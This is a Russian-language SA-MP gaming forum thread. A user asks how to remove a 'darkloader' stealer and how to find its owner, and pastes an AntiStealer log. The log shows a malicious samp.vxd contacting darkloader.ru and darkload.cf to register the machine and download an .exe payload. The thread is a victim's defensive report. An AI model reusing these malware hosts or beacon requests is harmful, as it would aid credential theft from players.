Как убрать стиллер от Данилы Горцунева (darkloader/darkstealer)?

Статус
В этой теме нельзя размещать новые ответы.

.night7

Новичок
Автор темы
16
1
Версия SA-MP
  1. 0.3.7 (R1)
  2. 0.3.7-R2
  3. 0.3.7-R3
  4. 0.3.7-R4
  5. 0.3DL
Есть логи антистиллера ДаркПиксель, за что большое ему спасибо, я бы тогда не узнал, и сейчас у меня вопрос, 1. Как убрать стиллер? 2. Как я могу найти самого владельца если знаю только его никнейм на darkloader'е
((
Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov
))
А ещё я смог скачать один из .exe файлов стиллера. Ну знаю как его скачать ( по какой ссылке )


|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|
|> | AntiStealer | V5.2.5 | By DarkP1xel | .LOG File | <|
|> Official Web-Site: https://blast.hk/ <|
|> Subscribe to my YouTube Channel: https://vk.cc/5PCsTe <|
|> Official Topic: https://blast.hk/threads/16018/ <|
|> DONATE: https://qiwi.me/antistealer/ <|
|> KEEP CALM AND SMOKE SOME WEED <|
|> !AntiStealer LOADED! <|
|>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<|

[PATCHED] > [Process32FirstW] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\RunDLL32Fix.asi]
[PATCHED] > [Process32NextW] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\RunDLL32Fix.asi]
[PATCHED] > [ZwSetInformationFile] > [C:\WINDOWS\System32\KERNELBASE.dll] > {FileInformationClass: HIDE}
[PATCHED] > [RtlInitUnicodeStringEx] > [C:\WINDOWS\SYSTEM32\ntdll.dll] > {SourceString: !0AntiStealerByDarkP1xel.ASI}
[WARNING] > [gethostbyname] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {name: darkloader.ru}
[WARNING] > [send] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {buf: GET /path.php?id=0060 HTTP/1.1

Host: darkloader.ru

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[WARNING] > [gethostbyname] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {name: darkloader.ru}
[WARNING] > [send] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {buf: GET /link.php?id=0060&pc_hash=136408432 HTTP/1.1

Host: darkloader.ru

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[WARNING] > [gethostbyname] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {name: darkload.cf}
[WARNING] > [send] > [C:\Users\super\Desktop\GTASAMP\GTAEVOLVE\samp.vxd] > {buf: GET /files/%EF%BB%BF60_1.exe HTTP/1.1

Host: darkload.cf

User-Agent: Ashot Samp | 05 region | Kavkaz RP | Prodazha baranov



}
[PATCHED] > [ZwWriteVirtualMemory] > [C:\WINDOWS\System32\KERNELBASE.dll] > {hProcess: BAD PROCESS}



UPDATED: Короче, я нашёл тот зловред, это был Memory2048.cs, все файлы остальные безопасны, спасибо всем кто помог!
 
Последнее редактирование:

Толкин

Активный
135
94
Статус
В этой теме нельзя размещать новые ответы.